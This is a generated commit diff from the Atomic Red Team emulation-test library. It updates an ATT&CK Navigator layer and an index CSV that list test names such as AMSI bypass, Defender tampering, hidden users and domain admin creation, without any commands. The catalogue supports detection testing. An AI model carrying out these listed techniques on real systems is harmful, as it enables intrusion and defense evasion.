Generate docs from job=validate_atomics_generate_docs branch=oscd

[OSCD] Test for T1016 - macOS firewall enumeration

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json

@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true}]}
+{"version":"3.0","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true}]}

atomics/Indexes/Indexes-CSV/index.csv

@@ -44,6 +44,7 @@ privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn
 privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
+privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -73,6 +74,8 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
 privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
@@ -109,6 +112,8 @@ persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
+persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -127,8 +132,10 @@ persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a
 persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
+persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
 persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
+persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 persistence,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
 persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
@@ -260,6 +267,7 @@ defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad+
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
+defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
 defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
@@ -275,22 +283,23 @@ defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on L
 defense-evasion,T1562.001,Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
 defense-evasion,T1562.001,Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
 defense-evasion,T1562.001,Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
-defense-evasion,T1562.001,Disable or Modify Tools,8,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
-defense-evasion,T1562.001,Disable or Modify Tools,9,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,10,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,11,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,13,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,14,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,15,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,16,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,17,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,18,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,19,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,20,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,21,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
+defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
+defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
@@ -311,11 +320,15 @@ defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden F
 defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
 defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
 defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
-defense-evasion,T1564.002,Hidden Users,1,Hidden Users,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
+defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
+defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
+defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
+defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
+defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
 defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
 defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
 defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
@@ -340,6 +353,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks,58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
+defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
+defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -426,6 +441,9 @@ defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e
 defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
+defense-evasion,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
+defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
+defense-evasion,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -434,6 +452,8 @@ defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp w
 defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
 defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
 defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
@@ -540,12 +560,16 @@ discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa
 discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
-discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps,ba62ce11-e820-485f-9c17-6f3c857cd840,sh
-discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
-discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
+discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
+discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
+discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
+discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
